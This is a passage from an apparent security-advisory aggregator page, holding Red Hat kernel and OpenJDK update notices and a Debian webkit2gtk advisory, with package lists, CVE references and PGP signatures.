kernel-debug-devel-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-debug-modules-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-debug-modules-extra-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-debuginfo-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-debuginfo-common-x86_64-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-devel-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-headers-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-modules-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-modules-extra-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-tools-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-tools-debuginfo-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-tools-libs-4.18.0-305.97.1.el8_4.x86_64.rpm  
perf-4.18.0-305.97.1.el8_4.x86_64.rpm  
perf-debuginfo-4.18.0-305.97.1.el8_4.x86_64.rpm  
python3-perf-4.18.0-305.97.1.el8_4.x86_64.rpm  
python3-perf-debuginfo-4.18.0-305.97.1.el8_4.x86_64.rpm

Red Hat Enterprise Linux BaseOS TUS (v.8.4):

Source:  
kernel-4.18.0-305.97.1.el8_4.src.rpm

aarch64:  
bpftool-4.18.0-305.97.1.el8_4.aarch64.rpm  
bpftool-debuginfo-4.18.0-305.97.1.el8_4.aarch64.rpm  
kernel-4.18.0-305.97.1.el8_4.aarch64.rpm  
kernel-core-4.18.0-305.97.1.el8_4.aarch64.rpm  
kernel-cross-headers-4.18.0-305.97.1.el8_4.aarch64.rpm  
kernel-debug-4.18.0-305.97.1.el8_4.aarch64.rpm  
kernel-debug-core-4.18.0-305.97.1.el8_4.aarch64.rpm  
kernel-debug-debuginfo-4.18.0-305.97.1.el8_4.aarch64.rpm  
kernel-debug-devel-4.18.0-305.97.1.el8_4.aarch64.rpm  
kernel-debug-modules-4.18.0-305.97.1.el8_4.aarch64.rpm  
kernel-debug-modules-extra-4.18.0-305.97.1.el8_4.aarch64.rpm  
kernel-debuginfo-4.18.0-305.97.1.el8_4.aarch64.rpm  
kernel-debuginfo-common-aarch64-4.18.0-305.97.1.el8_4.aarch64.rpm  
kernel-devel-4.18.0-305.97.1.el8_4.aarch64.rpm  
kernel-headers-4.18.0-305.97.1.el8_4.aarch64.rpm  
kernel-modules-4.18.0-305.97.1.el8_4.aarch64.rpm  
kernel-modules-extra-4.18.0-305.97.1.el8_4.aarch64.rpm  
kernel-tools-4.18.0-305.97.1.el8_4.aarch64.rpm  
kernel-tools-debuginfo-4.18.0-305.97.1.el8_4.aarch64.rpm  
kernel-tools-libs-4.18.0-305.97.1.el8_4.aarch64.rpm  
perf-4.18.0-305.97.1.el8_4.aarch64.rpm  
perf-debuginfo-4.18.0-305.97.1.el8_4.aarch64.rpm  
python3-perf-4.18.0-305.97.1.el8_4.aarch64.rpm  
python3-perf-debuginfo-4.18.0-305.97.1.el8_4.aarch64.rpm

noarch:  
kernel-abi-stablelists-4.18.0-305.97.1.el8_4.noarch.rpm  
kernel-doc-4.18.0-305.97.1.el8_4.noarch.rpm

ppc64le:  
bpftool-4.18.0-305.97.1.el8_4.ppc64le.rpm  
bpftool-debuginfo-4.18.0-305.97.1.el8_4.ppc64le.rpm  
kernel-4.18.0-305.97.1.el8_4.ppc64le.rpm  
kernel-core-4.18.0-305.97.1.el8_4.ppc64le.rpm  
kernel-cross-headers-4.18.0-305.97.1.el8_4.ppc64le.rpm  
kernel-debug-4.18.0-305.97.1.el8_4.ppc64le.rpm  
kernel-debug-core-4.18.0-305.97.1.el8_4.ppc64le.rpm  
kernel-debug-debuginfo-4.18.0-305.97.1.el8_4.ppc64le.rpm  
kernel-debug-devel-4.18.0-305.97.1.el8_4.ppc64le.rpm  
kernel-debug-modules-4.18.0-305.97.1.el8_4.ppc64le.rpm  
kernel-debug-modules-extra-4.18.0-305.97.1.el8_4.ppc64le.rpm  
kernel-debuginfo-4.18.0-305.97.1.el8_4.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-4.18.0-305.97.1.el8_4.ppc64le.rpm  
kernel-devel-4.18.0-305.97.1.el8_4.ppc64le.rpm  
kernel-headers-4.18.0-305.97.1.el8_4.ppc64le.rpm  
kernel-modules-4.18.0-305.97.1.el8_4.ppc64le.rpm  
kernel-modules-extra-4.18.0-305.97.1.el8_4.ppc64le.rpm  
kernel-tools-4.18.0-305.97.1.el8_4.ppc64le.rpm  
kernel-tools-debuginfo-4.18.0-305.97.1.el8_4.ppc64le.rpm  
kernel-tools-libs-4.18.0-305.97.1.el8_4.ppc64le.rpm  
perf-4.18.0-305.97.1.el8_4.ppc64le.rpm  
perf-debuginfo-4.18.0-305.97.1.el8_4.ppc64le.rpm  
python3-perf-4.18.0-305.97.1.el8_4.ppc64le.rpm  
python3-perf-debuginfo-4.18.0-305.97.1.el8_4.ppc64le.rpm

s390x:  
bpftool-4.18.0-305.97.1.el8_4.s390x.rpm  
bpftool-debuginfo-4.18.0-305.97.1.el8_4.s390x.rpm  
kernel-4.18.0-305.97.1.el8_4.s390x.rpm  
kernel-core-4.18.0-305.97.1.el8_4.s390x.rpm  
kernel-cross-headers-4.18.0-305.97.1.el8_4.s390x.rpm  
kernel-debug-4.18.0-305.97.1.el8_4.s390x.rpm  
kernel-debug-core-4.18.0-305.97.1.el8_4.s390x.rpm  
kernel-debug-debuginfo-4.18.0-305.97.1.el8_4.s390x.rpm  
kernel-debug-devel-4.18.0-305.97.1.el8_4.s390x.rpm  
kernel-debug-modules-4.18.0-305.97.1.el8_4.s390x.rpm  
kernel-debug-modules-extra-4.18.0-305.97.1.el8_4.s390x.rpm  
kernel-debuginfo-4.18.0-305.97.1.el8_4.s390x.rpm  
kernel-debuginfo-common-s390x-4.18.0-305.97.1.el8_4.s390x.rpm  
kernel-devel-4.18.0-305.97.1.el8_4.s390x.rpm  
kernel-headers-4.18.0-305.97.1.el8_4.s390x.rpm  
kernel-modules-4.18.0-305.97.1.el8_4.s390x.rpm  
kernel-modules-extra-4.18.0-305.97.1.el8_4.s390x.rpm  
kernel-tools-4.18.0-305.97.1.el8_4.s390x.rpm  
kernel-tools-debuginfo-4.18.0-305.97.1.el8_4.s390x.rpm  
kernel-zfcpdump-4.18.0-305.97.1.el8_4.s390x.rpm  
kernel-zfcpdump-core-4.18.0-305.97.1.el8_4.s390x.rpm  
kernel-zfcpdump-debuginfo-4.18.0-305.97.1.el8_4.s390x.rpm  
kernel-zfcpdump-devel-4.18.0-305.97.1.el8_4.s390x.rpm  
kernel-zfcpdump-modules-4.18.0-305.97.1.el8_4.s390x.rpm  
kernel-zfcpdump-modules-extra-4.18.0-305.97.1.el8_4.s390x.rpm  
perf-4.18.0-305.97.1.el8_4.s390x.rpm  
perf-debuginfo-4.18.0-305.97.1.el8_4.s390x.rpm  
python3-perf-4.18.0-305.97.1.el8_4.s390x.rpm  
python3-perf-debuginfo-4.18.0-305.97.1.el8_4.s390x.rpm

x86_64:  
bpftool-4.18.0-305.97.1.el8_4.x86_64.rpm  
bpftool-debuginfo-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-core-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-cross-headers-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-debug-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-debug-core-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-debug-debuginfo-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-debug-devel-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-debug-modules-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-debug-modules-extra-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-debuginfo-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-debuginfo-common-x86_64-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-devel-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-headers-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-modules-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-modules-extra-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-tools-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-tools-debuginfo-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-tools-libs-4.18.0-305.97.1.el8_4.x86_64.rpm  
perf-4.18.0-305.97.1.el8_4.x86_64.rpm  
perf-debuginfo-4.18.0-305.97.1.el8_4.x86_64.rpm  
python3-perf-4.18.0-305.97.1.el8_4.x86_64.rpm  
python3-perf-debuginfo-4.18.0-305.97.1.el8_4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-1281  
https://access.redhat.com/security/cve/CVE-2023-32233  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkv4WyAAoJENzjgjWX9erEWzAP/3aH5ij8k3UQw6u4FQY5GTbr  
1J+/pAbQodea0ri/p/pCPTkCw5IjpPSUuk5iNH+O6ruzyirRkh/vvsEUqF+Zve72  
gOLOhtCr4pcZwS2QWM3JQgiDmv+JwRb5ijJJsa2O6aRR1RDoE876ks5G29eoTXrQ  
2mFUq51eV5glD2SZ+AVFSKaGpHmH3ki06durlOojlpQkLn6RKcosmpiRpNfmdKAg  
13/TIWn8tmzR/9m9aa2g7Sd7Vt9HFoVdjBJL0qERP39f81nWClMu+wRYElpiHGBb  
FDC8UXuitESNCu6hURuIymaQLkYm2hVZOaT+UB+jaVw/8oKmaTCWgIiGseZ34vQ5  
ORIG07wdoHPERFBsCOviB+svUAM4ThEZhXNI7/OhLSvGQo/qPE9dmh2ZqElGZznO  
6y6TigVTWH/dkeLoKu+HLtokbZXFXkyZxKo7LargiWsJt3ragkDt/2dNScy3x4Qx  
ceiOFUEe4u0l/7yK675Bi1zw3FQelI92iJ+yd6UVMm+UWZLebuCBDTmaYpwDDpR0  
2K/BW4FtBAlxyXcvyibzUC3qx424oauKUfutJevsR2LPFUngfQk5prmw73HLAI4Z  
PiVvztteNbQEuRpsWk42JWuurbIdq35SgaS9LfUpmMXhy9jX17SjgnRHSX4i+nxk  
kSt8EztI4g2zifLV0bu0  
=oqv/  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4256-01

Debian Linux Security Advisory 5457-1 - An anonymous researcher discovered that processing web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5457-1                   security@debian.org  
https://www.debian.org/security/                           Alberto Garcia  
July 22, 2023                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : webkit2gtk  
CVE ID         : CVE-2023-37450

The following vulnerabilities have been discovered in the WebKitGTK  
web engine:

CVE-2023-37450

    An anonymous researcher discovered that processing web content may  
    lead to arbitrary code execution. Apple is aware of a report that  
    this issue may have been actively exploited.

For the oldstable distribution (bullseye), this problem has been fixed  
in version 2.40.3-2~deb11u2.

For the stable distribution (bookworm), this problem has been fixed in  
version 2.40.3-2~deb12u2.

We recommend that you upgrade your webkit2gtk packages.

For the detailed security status of webkit2gtk please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/webkit2gtk

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEYrwugQBKzlHMYFizAAyEYu0C2AIFAmS7l4cACgkQAAyEYu0C  
2AJr/BAAnyKHOHxiOroDoQHyo/DrX4rS7UTRb3TQKmgxxlehEAm40lO7jMTG1HLD  
HW8v7Jk9dguaqD4pV09rR3lfFrHb24jzyPZs07sQ3m1c9JQUXJybcsCkbLZlXH/V  
BHiv/oUjLK6FW4lHzhx3YjJ1kw9V9w5VO1neTjP4N9PK9TSGmZyPeHFlWG/Rq9fN  
jDU2PdS48TZK3enBfGEcaKOUcdxUsqWIIRh8nJY1EXVXUpmujjb8oJEHltNlSoe7  
NGmaWsPmpRz71JYkFVzRRwcxqa1UEi4abMy9VHzPgcGomLXESbDhlZYGLPMmhV5s  
lV6w73j1qDTpDZrsB7klm/MoABkqED6gwg1GktwmOFC07hC2PQt1Kd5ubQGX041k  
0XCKf+JavPDsYgN2FV9BsuOvDXJX2hf21jcgw/M7nX0byVEpG+rZrzdecEPMND8I  
+v0Lugs8D+Zg/80QaVqhA1hTQcwJgZVDn2GhB+8GfB4i0zhERHugkQsjCMIgkeh3  
XQw8dXixJNCCG3S6G63lJaRgKyw2lDlG1yYuEgQlXvxsopIHc9Itt71sPgTd5Fsk  
nvXiwMRkuqmytbOIcfaaIqPAe146l6O22sGICeYU59GdoEWcSstQCO6Gd1PJDJ8I  
8h4IFTwxPGbVq5WIyX8mogK/n8FTPb788HrYcK/NLcCu5Kh23xY=  
=g6Fh  
-----END PGP SIGNATURE-----

Debian Security Advisory 5457-1

Red Hat Security Advisory 2023-4166-01 - The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime Environment and the OpenJDK 8 Java Software Development Kit. Issues addressed include an integer overflow vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: java-1.8.0-openjdk security and bug fix update  
Advisory ID:       RHSA-2023:4166-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4166  
Issue date:        2023-07-21  
CVE Names:         CVE-2023-22045 CVE-2023-22049   
=====================================================================

1. Summary:

An update for java-1.8.0-openjdk is now available for Red Hat Enterprise  
Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64  
Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64  
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64

3. Description:

The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime  
Environment and the OpenJDK 8 Java Software Development Kit.

Security Fix(es):

* OpenJDK: improper handling of slash characters in URI-to-path conversion  
(8305312) (CVE-2023-22049)

* OpenJDK: array indexing integer overflow issue (8304468) (CVE-2023-22045)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Prepare for the next quarterly OpenJDK upstream release (2023-07, 8u382)  
(BZ#2217708)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of OpenJDK Java must be restarted for this update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2217708 - Prepare for the next quarterly OpenJDK upstream release (2023-07, 8u382) [rhel-7.9.z]  
2221645 - CVE-2023-22045 OpenJDK: array indexing integer overflow issue (8304468)  
2221647 - CVE-2023-22049 OpenJDK: improper handling of slash characters in URI-to-path conversion (8305312)

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
java-1.8.0-openjdk-1.8.0.382.b05-1.el7_9.src.rpm

x86_64:  
java-1.8.0-openjdk-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-headless-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-headless-1.8.0.382.b05-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

noarch:  
java-1.8.0-openjdk-javadoc-1.8.0.382.b05-1.el7_9.noarch.rpm  
java-1.8.0-openjdk-javadoc-zip-1.8.0.382.b05-1.el7_9.noarch.rpm

x86_64:  
java-1.8.0-openjdk-accessibility-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-demo-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-demo-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-devel-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-devel-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-src-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-src-1.8.0.382.b05-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source:  
java-1.8.0-openjdk-1.8.0.382.b05-1.el7_9.src.rpm

x86_64:  
java-1.8.0-openjdk-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-headless-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-headless-1.8.0.382.b05-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

noarch:  
java-1.8.0-openjdk-javadoc-1.8.0.382.b05-1.el7_9.noarch.rpm  
java-1.8.0-openjdk-javadoc-zip-1.8.0.382.b05-1.el7_9.noarch.rpm

x86_64:  
java-1.8.0-openjdk-accessibility-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-demo-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-demo-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-devel-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-devel-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-src-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-src-1.8.0.382.b05-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
java-1.8.0-openjdk-1.8.0.382.b05-1.el7_9.src.rpm

ppc64:  
java-1.8.0-openjdk-1.8.0.382.b05-1.el7_9.ppc64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.el7_9.ppc64.rpm  
java-1.8.0-openjdk-devel-1.8.0.382.b05-1.el7_9.ppc64.rpm  
java-1.8.0-openjdk-headless-1.8.0.382.b05-1.el7_9.ppc64.rpm

ppc64le:  
java-1.8.0-openjdk-1.8.0.382.b05-1.el7_9.ppc64le.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.el7_9.ppc64le.rpm  
java-1.8.0-openjdk-devel-1.8.0.382.b05-1.el7_9.ppc64le.rpm  
java-1.8.0-openjdk-headless-1.8.0.382.b05-1.el7_9.ppc64le.rpm

s390x:  
java-1.8.0-openjdk-1.8.0.382.b05-1.el7_9.s390x.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.el7_9.s390x.rpm  
java-1.8.0-openjdk-devel-1.8.0.382.b05-1.el7_9.s390x.rpm  
java-1.8.0-openjdk-headless-1.8.0.382.b05-1.el7_9.s390x.rpm

x86_64:  
java-1.8.0-openjdk-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-devel-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-devel-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-headless-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-headless-1.8.0.382.b05-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

noarch:  
java-1.8.0-openjdk-javadoc-1.8.0.382.b05-1.el7_9.noarch.rpm  
java-1.8.0-openjdk-javadoc-zip-1.8.0.382.b05-1.el7_9.noarch.rpm

ppc64:  
java-1.8.0-openjdk-accessibility-1.8.0.382.b05-1.el7_9.ppc64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.el7_9.ppc64.rpm  
java-1.8.0-openjdk-demo-1.8.0.382.b05-1.el7_9.ppc64.rpm  
java-1.8.0-openjdk-src-1.8.0.382.b05-1.el7_9.ppc64.rpm

ppc64le:  
java-1.8.0-openjdk-accessibility-1.8.0.382.b05-1.el7_9.ppc64le.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.el7_9.ppc64le.rpm  
java-1.8.0-openjdk-demo-1.8.0.382.b05-1.el7_9.ppc64le.rpm  
java-1.8.0-openjdk-src-1.8.0.382.b05-1.el7_9.ppc64le.rpm

s390x:  
java-1.8.0-openjdk-accessibility-1.8.0.382.b05-1.el7_9.s390x.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.el7_9.s390x.rpm  
java-1.8.0-openjdk-demo-1.8.0.382.b05-1.el7_9.s390x.rpm  
java-1.8.0-openjdk-src-1.8.0.382.b05-1.el7_9.s390x.rpm

x86_64:  
java-1.8.0-openjdk-accessibility-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-demo-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-demo-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-src-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-src-1.8.0.382.b05-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
java-1.8.0-openjdk-1.8.0.382.b05-1.el7_9.src.rpm

x86_64:  
java-1.8.0-openjdk-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-devel-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-devel-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-headless-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-headless-1.8.0.382.b05-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

noarch:  
java-1.8.0-openjdk-javadoc-1.8.0.382.b05-1.el7_9.noarch.rpm  
java-1.8.0-openjdk-javadoc-zip-1.8.0.382.b05-1.el7_9.noarch.rpm

x86_64:  
java-1.8.0-openjdk-accessibility-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-demo-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-demo-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-src-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-src-1.8.0.382.b05-1.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-22045  
https://access.redhat.com/security/cve/CVE-2023-22049  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkuybJAAoJENzjgjWX9erEvHwP/3cWR+ifiWTA6xGRRCiciFn9  
ehOMpQmJGHRAen/Vd+cvWZ638V7bW4Q8gy6rPFrxeuYRYBG/hFw+3nl88hDdLxNQ  
MdsF0U14fzxIQOBgNfXvFRds+Z+I03JmDhlJ9F+Pbx/2nMfou2WYRDLdipylG0by  
JjbH7QiOBSb0XDB9dOb0TNuyHsyTavmIn6cmqDDCachxFcJObh1TAtkCX3BfaGz/  
f1pMx0Tnsd2oIvIkMTlMiax8X0wFnTnGKMemcMk6yEL9P/g8j2/grWf89+cvjC3c  
grZQ1eTa+G2VePLvLPeN0G/hAbsHYg+o5Qi60T32qMtsnN4HNVq2x3iQWCyVietW  
mvVapyLB9JpISVQRevt59NNa7eqAzLR5sR2mIk744G4nFbdWU9fKS2YM4c0oefXa  
eWsC832Ide0pdKQVF1nv/GoDEy7ri4QNzbMDCTrDzDWva/wt0MxnTKzcyalx3jEe  
RigzUJ3a7mdfAIrmoyBrdOMN+Cz3vzj00gouQZ7rSVGyL12XRbHyuRcX1WNBOMBq  
ribVBaCGaReqj3wVen+JX++UGMvHDURx7yu77JJe5VlbTKTaGSN2jUMlODwzhjOS  
9CuyYhMxj7xU4XB2XuVP5sN0n2nfcS4mK021Oe9hsJuWjuc5qfAAS2zxfHkHFxPb  
U9606GX5T3Mjp+kqVFZs  
=9Pqu  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4166-01

Logwatch analyzes and reports on unix system logs. It is a customizable and pluggable log monitoring system which will go through the logs for a given period of time and make a customizable report. It should work right out of the package on most systems.

Source

Packet Storm